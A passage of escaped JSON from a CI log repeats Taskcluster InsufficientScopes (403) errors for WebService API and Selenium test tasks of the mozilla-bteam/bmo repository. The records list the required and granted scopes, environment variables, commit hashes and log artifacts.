\\\"GITHUB_BASE_SHA\\\": \\\"639a051e3aea3608efd7607b944b2c33aa17cfe5\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"mozilla-bteam\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"93826b5e5289cef8b6b15ba630fe522d236e9933\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"mozilla-bteam@noreply.github.com\\\"\\n    },\\n    \\\"artifacts\\\": {\\n      \\\"public/runtests_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/runtests.log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      },\\n      \\\"public/httpd_error_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/httpd/error_log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      }\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"WebService API Tests\\\",\\n    \\\"description\\\": \\\"WebService API Tests\\\",\\n    \\\"owner\\\": \\\"mozilla-bteam@noreply.github.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-27T02:16:26.390Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-28T02:16:26.390Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"DMPwKGYlRU63tistQqvPzQ\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"scopes\\\": [],\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-28T02:16:26.390Z\\\"\\n}\\n  time:     2016-09-27T02:16:26.807Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-bteam/bmo:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n    \\\"queue:route:gaia-taskcluster\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-bteam/bmo:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n  \\\"queue:route:gaia-taskcluster\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"Tzpe9WhETzSYjeeJy_C9DQ\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"routes\\\": [\\n    \\\"notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n    \\\"notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"notify.irc-channel.#bteam.on-exception\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.opened\\\",\\n        \\\"pull_request.synchronize\\\",\\n        \\\"pull_request.reopened\\\",\\n        \\\"push\\\"\\n      ]\\n    },\\n    \\\"treeherder\\\": {\\n      \\\"symbol\\\": \\\"API\\\",\\n      \\\"machine\\\": {\\n        \\\"platform\\\": \\\"linux64\\\",\\n        \\\"build\\\": {\\n          \\\"platform\\\": \\\"linux64\\\"\\n        }\\n      }\\n    }\\n  },\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 3600,\\n    \\\"reruns\\\": 3,\\n    \\\"image\\\": \\\"mozillabteam/bmo-ci\\\",\\n    \\\"command\\\": [\\n      \\\"runtests.sh\\\"\\n    ],\\n    \\\"env\\\": {\\n      \\\"TEST_SUITE\\\": \\\"webservices\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.synchronize\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 8,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-bteam\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"639a051e3aea3608efd7607b944b2c33aa17cfe5\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"mozilla-bteam\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"93826b5e5289cef8b6b15ba630fe522d236e9933\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"mozilla-bteam@noreply.github.com\\\"\\n    },\\n    \\\"artifacts\\\": {\\n      \\\"public/runtests_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/runtests.log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      },\\n      \\\"public/httpd_error_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/httpd/error_log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      }\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"WebService API Tests\\\",\\n    \\\"description\\\": \\\"WebService API Tests\\\",\\n    \\\"owner\\\": \\\"mozilla-bteam@noreply.github.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-27T02:16:26.390Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-28T02:16:26.390Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"DMPwKGYlRU63tistQqvPzQ\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"scopes\\\": [],\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-28T02:16:26.390Z\\\"\\n}\\n  time:     2016-09-27T02:16:26.807Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-bteam/bmo:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n    \\\"queue:route:gaia-taskcluster\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"Tzpe9WhETzSYjeeJy_C9DQ\"\n                },\n                \"payload\": {\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"routes\": [\n                        \"notify.email.mozilla-bteam@noreply.github.com.on-any\",\n                        \"notify.irc-channel.#bteam.on-failed\",\n                        \"notify.irc-channel.#bteam.on-exception\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.opened\",\n                                \"pull_request.synchronize\",\n                                \"pull_request.reopened\",\n                                \"push\"\n                            ]\n                        },\n                        \"treeherder\": {\n                            \"symbol\": \"API\",\n                            \"machine\": {\n                                \"platform\": \"linux64\",\n                                \"build\": {\n                                    \"platform\": \"linux64\"\n                                }\n                            }\n                        }\n                    },\n                    \"payload\": {\n                        \"maxRunTime\": 3600,\n                        \"reruns\": 3,\n                        \"image\": \"mozillabteam/bmo-ci\",\n                        \"command\": [\n                            \"runtests.sh\"\n                        ],\n                        \"env\": {\n                            \"TEST_SUITE\": \"webservices\",\n                            \"GITHUB_EVENT\": \"pull_request.synchronize\",\n                            \"GITHUB_BRANCH\": \"master\",\n                            \"GITHUB_PULL_REQUEST\": 8,\n                            \"GITHUB_BASE_REPO_URL\": \"https://github.com/mozilla-bteam/bmo.git\",\n                            \"GITHUB_BASE_USER\": \"mozilla-bteam\",\n                            \"GITHUB_BASE_SHA\": \"639a051e3aea3608efd7607b944b2c33aa17cfe5\",\n                            \"GITHUB_BASE_BRANCH\": \"master\",\n                            \"GITHUB_BASE_REF\": \"master\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/mozilla-bteam/bmo.git\",\n                            \"GITHUB_HEAD_USER\": \"mozilla-bteam\",\n                            \"GITHUB_HEAD_SHA\": \"93826b5e5289cef8b6b15ba630fe522d236e9933\",\n                            \"GITHUB_HEAD_BRANCH\": \"development\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"mozilla-bteam@noreply.github.com\"\n                        },\n                        \"artifacts\": {\n                            \"public/runtests_log\": {\n                                \"type\": \"file\",\n                                \"path\": \"/var/log/runtests.log\",\n                                \"expires\": \"2018-02-17T17:33:38.806Z\"\n                            },\n                            \"public/httpd_error_log\": {\n                                \"type\": \"file\",\n                                \"path\": \"/var/log/httpd/error_log\",\n                                \"expires\": \"2018-02-17T17:33:38.806Z\"\n                            }\n                        }\n                    },\n                    \"metadata\": {\n                        \"name\": \"WebService API Tests\",\n                        \"description\": \"WebService API Tests\",\n                        \"owner\": \"mozilla-bteam@noreply.github.com\",\n                        \"source\": \"https://github.com/mozilla-bteam/bmo.git\"\n                    },\n                    \"created\": \"2016-09-27T02:16:26.390Z\",\n                    \"deadline\": \"2016-09-28T02:16:26.390Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"DMPwKGYlRU63tistQqvPzQ\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"scopes\": [],\n                    \"tags\": {},\n                    \"expires\": \"2017-09-28T02:16:26.390Z\"\n                },\n                \"time\": \"2016-09-27T02:16:26.807Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\",\n                        \"queue:route:notify.irc-channel.#bteam.on-failed\",\n                        \"queue:route:notify.irc-channel.#bteam.on-exception\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-bteam/bmo:pull-request\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:define-task:aws-provisioner-v1/b2gtest\",\n                    \"queue:route:gaia-taskcluster\",\n                    \"queue:route:index.garbage.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\",\n                    \"queue:route:tc-treeherder.bmo-development.*\",\n                    \"queue:route:tc-treeherder.bmo-master.*\",\n                    \"queue:route:tc-treeherder.bmo-upstream-merge.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    },\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-bteam/bmo:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n  \\\"queue:route:gaia-taskcluster\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"NEi9PYV_RAiLPPW4v9_Qdw\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"routes\\\": [\\n    \\\"notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n    \\\"notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"notify.irc-channel.#bteam.on-exception\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.opened\\\",\\n        \\\"pull_request.synchronize\\\",\\n        \\\"pull_request.reopened\\\",\\n        \\\"push\\\"\\n      ]\\n    },\\n    \\\"treeherder\\\": {\\n      \\\"symbol\\\": \\\"Sel\\\",\\n      \\\"machine\\\": {\\n        \\\"platform\\\": \\\"linux64\\\",\\n        \\\"build\\\": {\\n          \\\"platform\\\": \\\"linux64\\\"\\n        }\\n      }\\n    }\\n  },\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 3600,\\n    \\\"reruns\\\": 3,\\n    \\\"image\\\": \\\"mozillabteam/bmo-ci\\\",\\n    \\\"command\\\": [\\n      \\\"runtests.sh\\\"\\n    ],\\n    \\\"env\\\": {\\n      \\\"TEST_SUITE\\\": \\\"selenium\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.synchronize\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 8,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-bteam\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"639a051e3aea3608efd7607b944b2c33aa17cfe5\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"mozilla-bteam\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"93826b5e5289cef8b6b15ba630fe522d236e9933\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"mozilla-bteam@noreply.github.com\\\"\\n    },\\n    \\\"artifacts\\\": {\\n      \\\"public/runtests_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/runtests.log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      },\\n      \\\"public/httpd_error_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/httpd/error_log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      },\\n      \\\"public/selenium_log\\\\\\\"\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/selenium.log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      }\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"Selenium Tests\\\",\\n    \\\"description\\\": \\\"Selenium Tests\\\",\\n    \\\"owner\\\": \\\"mozilla-bteam@noreply.github.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-27T02:16:26.390Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-28T02:16:26.390Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"DMPwKGYlRU63tistQqvPzQ\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"scopes\\\": [],\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-28T02:16:26.390Z\\\"\\n}\\n  time:     2016-09-27T02:16:26.813Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-bteam/bmo:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n    \\\"queue:route:gaia-taskcluster\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-bteam/bmo:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n  \\\"queue:route:gaia-taskcluster\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:route:notify.email.mozilla-bteam@noreply.github.com.on-any\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"NEi9PYV_RAiLPPW4v9_Qdw\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"routes\\\": [\\n    \\\"notify.email.mozilla-bteam@noreply.github.com.on-any\\\",\\n    \\\"notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"notify.irc-channel.#bteam.on-exception\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.opened\\\",\\n        \\\"pull_request.synchronize\\\",\\n        \\\"pull_request.reopened\\\",\\n        \\\"push\\\"\\n      ]\\n    },\\n    \\\"treeherder\\\": {\\n      \\\"symbol\\\": \\\"Sel\\\",\\n      \\\"machine\\\": {\\n        \\\"platform\\\": \\\"linux64\\\",\\n        \\\"build\\\": {\\n          \\\"platform\\\": \\\"linux64\\\"\\n        }\\n      }\\n    }\\n  },\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 3600,\\n    \\\"reruns\\\": 3,\\n    \\\"image\\\": \\\"mozillabteam/bmo-ci\\\",\\n    \\\"command\\\": [\\n      \\\"runtests.sh\\\"\\n    ],\\n    \\\"env\\\": {\\n      \\\"TEST_SUITE\\\": \\\"selenium\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.synchronize\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 8,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-bteam\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"639a051e3aea3608efd7607b944b2c33aa17cfe5\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"mozilla-bteam\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"93826b5e5289cef8b6b15ba630fe522d236e9933\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"mozilla-bteam@noreply.github.com\\\"\\n    },\\n    \\\"artifacts\\\": {\\n      \\\"public/runtests_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/runtests.log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      },\\n      \\\"public/httpd_error_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/httpd/error_log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      },\\n      \\\"public/selenium_log\\\\\\\"\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/selenium.log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      }\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"Selenium Tests\\\",\\n    \\\"description\\\": \\\"Selenium Tests\\\",\\n    \\\"owner\\\": \\\"mozilla-bteam@noreply.github.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-27T02:16:26.390Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-28T02:16:26.390Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"DMPwKGYlRU63tistQqvPzQ\\\",\\n  